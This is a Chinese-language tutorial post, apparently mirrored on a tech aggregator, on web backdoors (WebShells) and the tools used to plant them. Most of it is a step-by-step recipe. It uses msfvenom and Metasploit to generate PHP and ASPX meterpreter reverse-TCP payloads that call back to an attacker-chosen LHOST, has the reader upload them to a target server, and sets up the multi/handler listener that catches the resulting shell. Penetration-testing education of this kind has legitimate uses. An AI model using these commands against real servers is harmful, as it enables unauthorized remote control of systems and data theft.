IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		图片批量下载器
↓批量下载图片,美女图库↓ 		图片自动播放器
↓图片自动播放器↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> Web 后门 -> 正文阅读

[PHP知识库]Web 后门

????????Web 后门泛指 WebShell,其实就是一段网页代码,包括 ASP、ASP.NET、PHP、JSP代码等。由于这些代码都运行在服务器,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。(更具隐蔽性)

??????? Web 后门能提供非常多的功能,如执行命令、浏览文案、辅助提权、执行SQL语句、反弹Shell 等。 Windows 系统下比较出名的莫过于 “中国菜刀”,还有很多替代“中国菜刀”的跨平台开源工具,例如 “中国蚁剑” 和 Cknife,均支持 Mac、Linux 和 Windows。在 Kali 下,用的比较多的就是 Weevely,Weevely支持的功能很强大,使用 http 头进行指令传输,唯一的缺点就是只支持 PHP。其实 Metasploit 框架中也自带了 Web 后门,配合 Meterpreter 使用时,功能更强大。

msfvenom -help    //查询msfvenom使用指南
msfvenom --list formats    //msfvenom支持输出格式

?

1.Meterpreter 后门

??????? 在 Metasploit 中,有一个名为 PHP Meterpreter 的 Payload,利用这个模块可创建具有 Metapreter 功能的 PHP WebShell。在攻击中使用的 Metasploit PHP Shell 的步骤如下

  1. 使用 msfvenom 创建一个 webshell.php
  2. 上传 webshell.php 到目标服务器
  3. 运行 Metasploit multi-handler 开始监听
  4. 访问 webshell.php 页面
  5. 获得反弹的 Metasploit Shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.110.130 -f raw > test.php

-p:设置payload

-f:设置输出文件格式

设置监听?

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.110.130

?

2.Aspx Meterpreter

metasploit 下名为 shell_reverse_tcp 的 Payload ,利用这个模块可创建具有 Meterpreter 功能的各版本的 ShellCode,例如比较常见的 Asp,Aspx,msi,vbs,war等

ASP

ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境,可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASP文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本置标语言)网页文件中的服务器端脚本代码。除服务器端脚本代码外,ASP文件也可以包含文本、HTML(包括相关的客户端脚本)和com组件调用。

Aspx

aspx文件是微软的在服务器端运行的动态网页文件,属于ASP.NET技术。ASP.NET是由微软在·NET Framework框架中所提供,开发Web应用程序的类库,封装在System.Web.dll文件中,显露出System.Web命名空间,并提供ASP.NET网页处理、扩充以及HTTP通道的应用程序与通信处理等工作,以及Web Service的基础架构。ASP.NET是ASP技术的后继者,但它的发展性要比ASP技术强大许多。

VBS

VBS是基于Visual Basic的脚本语言。VBS的全称是:Microsoft Visual Basic Script Edition。(微软公司可视化BASIC脚本版)。

Aspx Meterpreter 后门 与 PHP shell 差不多

show payloads
use windows/shell_reverse_tcp    //简单执行命令
info
set LHOST 192.168.110.130
set LPORT 4444
save

generate -f asp    //生成Asp版本的ShellCode
generate -f aspx   //生成Aspx版本的ShellCode

?

生成 aspx 版本的shellcode 保存(默认/root),上传到目标服务器

generate -f aspx -o test.aspx

?

?启动监听,目标服务器访问(浏览器)

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.110.130
set LPORT 4444

?

?
  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-11-23 12:08:25  更:2021-11-23 12:08:58 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2025年11日历 -2025/11/1 0:48:37-

图片自动播放器
↓图片自动播放器↓ 		TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓ 		图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码